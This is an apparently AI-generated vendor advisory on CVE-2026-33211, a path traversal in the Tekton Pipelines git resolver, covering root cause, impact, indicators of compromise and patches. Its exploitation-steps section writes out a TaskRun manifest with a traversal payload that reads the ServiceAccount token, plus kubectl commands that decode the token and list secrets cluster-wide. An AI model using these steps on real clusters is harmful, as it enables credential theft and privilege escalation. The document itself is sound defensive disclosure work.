CVE-2026-33211: 
Wolfi vulnerability analysis and mitigation

Overview

CVE-2026-33211 is a path traversal vulnerability in the Tekton Pipelines git resolver that allows a namespace-scoped tenant to read arbitrary files from the resolver pod's filesystem, including Kubernetes ServiceAccount tokens. Disclosed on March 18, 2026, it affects github.com/tektoncd/pipeline versions 1.0.0, 1.1.0–1.3.2, 1.4.0–1.6.0, 1.7.0–1.9.1, and 1.10.0. Versions prior to v1.0.0 (e.g., v0.70.0 and earlier) are not affected. It carries a CVSS v3.1 base score of 9.6 (Critical) (GitHub Advisory, Red Hat Bugzilla).

Technical details

The root cause (CWE-22: Path Traversal) lies in the getFileContent() function in pkg/resolution/resolver/git/repository.go, which constructs a file path by joining the repository clone directory with the user-supplied pathInRepo parameter using os.ReadFile(filepath.Join(repo.directory, path)) — without any validation of .. components or symlink escapes. The vulnerability was introduced in commit 318006c4e3a5, which switched the git resolver from the go-git library (using an in-memory filesystem that cannot be escaped) to shelling out to the git binary and reading files directly from the real filesystem with os.ReadFile(). An attacker with permission to create TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver can supply a crafted pathInRepo value such as ../../../../var/run/secrets/kubernetes.io/serviceaccount/token to escape the cloned repository directory; the file contents are returned base64-encoded in resolutionrequest.status.data, creating a clear exfiltration channel. Symlink-based escapes using in-repo symlinks pointing outside the clone directory are also exploitable (GitHub Advisory, Fix Commit).

Impact

Successful exploitation enables two high-severity outcomes: arbitrary file read of any file accessible to the resolver pod process, and credential exfiltration leading to cluster-wide privilege escalation. The resolver pod's ServiceAccount token is readable at the well-known path /var/run/secrets/kubernetes.io/serviceaccount/token, and in the default RBAC configuration the tekton-pipelines-resolvers ServiceAccount has get, list, and watch permissions on Secrets cluster-wide. An attacker who exfiltrates this token can escalate from namespace-scoped access to reading all Secrets across all namespaces in the Kubernetes cluster, representing a significant lateral movement and data exposure risk (GitHub Advisory, Red Hat Bugzilla).

Exploitability

No public proof-of-concept exploit code has been published, and there is no evidence of in-the-wild exploitation at this time (GitHub Advisory). The vulnerability requires low privileges — specifically, the ability to create TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver within a namespace — and no user interaction. The EPSS score is approximately 0.023% (9th percentile), indicating a currently low probability of exploitation within 30 days. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify a Tekton Pipelines installation running an affected version (v1.0.0–v1.10.0) where the attacker has namespace-scoped permissions to create TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver.
  2. Craft malicious TaskRun: Create a TaskRun or PipelineRun manifest that references the git resolver with a legitimate repository URL but sets the pathInRepo parameter to a path traversal sequence targeting a sensitive file, for example:
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: exfil-token
spec:
  taskRef:
    resolver: git
    params:
    - name: url
      value: https://github.com/tektoncd/catalog
    - name: revision
      value: main
    - name: pathInRepo
      value: ../../../../var/run/secrets/kubernetes.io/serviceaccount/token
  1. Submit the resource: Apply the manifest to the cluster using kubectl apply -f malicious-taskrun.yaml.
  2. Retrieve exfiltrated data: Inspect the resulting ResolutionRequest object's status field, where the file contents are returned base64-encoded:
kubectl get resolutionrequest <name> -o jsonpath='{.status.data}' | base64 -d
  1. Use the ServiceAccount token: Decode the retrieved token and use it to authenticate against the Kubernetes API server with cluster-wide secret read access:
kubectl --token=<decoded-token> get secrets --all-namespaces
  1. Lateral movement: Use the harvested secrets (e.g., cloud provider credentials, registry tokens, application secrets) to pivot to other systems or escalate privileges further (GitHub Advisory, Fix Commit).

Indicators of compromise

  • Kubernetes API Logs: ResolutionRequest objects created with pathInRepo values containing .. sequences (e.g., ../../../../var/run/secrets/kubernetes.io/serviceaccount/token, ../../../../etc/passwd) visible in the Kubernetes audit log.
  • Tekton Resolver Logs: Log entries from the tekton-pipelines-resolvers pod containing the message attempts to escape the repository directory (possible path traversal attack) (present in patched versions) or unexpected file-read errors for paths outside the repository directory.
  • ResolutionRequest Status: ResolutionRequest objects with status.data fields containing base64-encoded content of system files (e.g., JWT tokens, /etc/passwd content) rather than expected pipeline YAML.
  • Network: Outbound API calls from the tekton-pipelines-resolvers ServiceAccount token to the Kubernetes API server (/api/v1/secrets) across multiple namespaces, especially if originating from an unexpected source IP or client.
  • Kubernetes RBAC Audit: Unexpected get or list requests on secrets resources across all namespaces attributed to the tekton-pipelines-resolvers ServiceAccount or a token derived from it.

Mitigation and workarounds

Upgrade to one of the patched versions: 1.0.1, 1.3.3, 1.6.1, 1.9.2, or 1.10.2. The fix adds two layers of defense: (1) validation of pathInRepo in PopulateDefaultParams() to reject any path containing .. components, and (2) a containment check using filepath.EvalSymlinks() in getFileContent() to prevent symlink-based escapes from attacker-controlled repositories. If immediate upgrade is not possible, restrict which users can create TaskRuns, PipelineRuns, or ResolutionRequests that use the git resolver via Kubernetes RBAC. Additionally, reduce the blast radius by scoping the tekton-pipelines-resolvers ServiceAccount's RBAC permissions using a custom ClusterRole with more restrictive rules, limiting secret access to only necessary namespaces (GitHub Advisory, Red Hat Bugzilla).

Community reactions

The vulnerability was reported by security researcher Oleh Konko (@1seal), who provided a thorough vulnerability analysis, proof-of-concept, and review of the fix, and was acknowledged in the GitHub Advisory (GitHub Advisory). Red Hat tracked the issue via Bugzilla (Bug 2450554) and issued security errata (RHSA-2026:10125 and RHSA-2026:24484) for affected products (Red Hat Bugzilla). openSUSE also published security announcements addressing the vulnerability in their Tekton packages. Community discussion was noted on Bluesky and security aggregator platforms shortly after disclosure.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

RHEL / CentOS

Fixed

OpenShift

el9:openshift-builds/openshift-builds-rhel9-operator-0:1.6.4

Fixed

Source: This report was generated using AI

Related Wolfi vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103000HIGH8.7
  • Python logoPython
  • litellm-1.101
NoYesSep 30, 2026
CVE-2026-102999HIGH8.7
  • Python logoPython
  • litellm-1.98
NoYesSep 30, 2026
CVE-2026-102998HIGH8.7
  • Python logoPython
  • litellm-1.98
NoYesSep 30, 2026
CVE-2026-102997HIGH8.7
  • Python logoPython
  • pypdf
NoYesSep 30, 2026
CVE-2026-77387MEDIUM4
  • Python logoPython
  • superset-6.1
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management